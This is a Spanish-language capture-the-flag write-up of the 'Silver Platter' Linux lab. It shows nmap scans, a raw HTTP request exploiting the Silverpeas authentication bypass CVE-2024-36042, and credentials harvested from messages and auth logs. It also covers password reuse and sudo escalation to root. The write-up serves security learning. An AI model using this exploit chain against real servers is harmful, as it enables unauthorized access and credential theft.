BlogTwitterLinkedIn

Silver Platter (Linux)

Can you breach the server?

Enumeración de Red

Nmap

Scan general y específico de servicios
sudo nmap -sS --min-rate 500 -p- --open -n -Pn 10.10.151.86 -oN enum/puertos
nmap -sCV -p22,80,8080 10.10.151.86 -oN enum/nmap
Resultado nmap
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 03:d8:c6:65:71:17:75:ac:9c:d1:9f:f7:6a:7f:c6:5a (ECDSA)
|_  256 76:44:4f:ad:06:7c:d0:50:2f:90:14:e6:1e:07:49:b0 (ED25519)
80/tcp   open  http       nginx 1.18.0 (Ubuntu)
|_http-title: Hack Smarter Security
|_http-server-header: nginx/1.18.0 (Ubuntu)
8080/tcp open  http-proxy
|_http-title: Error

Enumeración de Servicio Web - p80

http://10.10.151.86/#contact

If you'd like to get in touch with us, please reach out to our project manager on Silverpeas. His username is "scr1ptkiddy".

Enumeración de Servicio Web - p8080

http://10.10.151.86:8080/silverpeas/defaultLogin.jsp

  • Silverpeas: Open source collaborative intranet

Explotación: CVE-2024-36042 (Silverpeas CRM - Authentication Bypass)

https://gist.github.com/ChrisPritchard/4b6d5c70d9329ef116266a6c238dcb2d

Explotación de Auth Bypass
POST /silverpeas/AuthenticationServlet HTTP/2
Host: 10.10.151.86:8080
Content-Length: 28
Origin: https://10.10.151.86:8080
Content-Type: application/x-www-form-urlencoded

Login=scr1ptkiddy&DomainId=0

Auth bypass: scr1ptkiddy

Enumeración Post-Explotación

Mensajes de scr1ptkiddy

Manager: Tyler just asked if I wanted to play VR but he left you out scr1ptkiddy (what a jerk). Want to join us? We will probably hop on in like an hour or so.

  • Users: Tyler, Manager.

Auth bypass: Manager

Mensajes de Manager

Administrator: Dude how do you always forget the SSH password? Use a password manager and quit using your silly sticky notes.

  • tim:cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol

Intrusíón en el Sistema

Shell: Tim

Enumeración Post-Intrusión

Enumerar membresía de grupos
id

  • groups=4(adm)

En Linux, el grupo adm (administrador) es un grupo del sistema que se utiliza para dar acceso a los archivos de registro del sistema, principalmente ubicados en /var/log

Escalada de Privilegios

Buscar rastros de contraseñas en los auth.logs
cat /var/log/auth* | grep -i pass

  • DB_USER=silverpeas -e DB_PASSWORD=_Zd_zx7N823/

  • Password reuse?

Shell: Tyler

Escalada de Privilegios II

sudo -l

  • (ALL : ALL) ALL

sudo su

Compromiso del Sistema

Shell: Root

Última actualización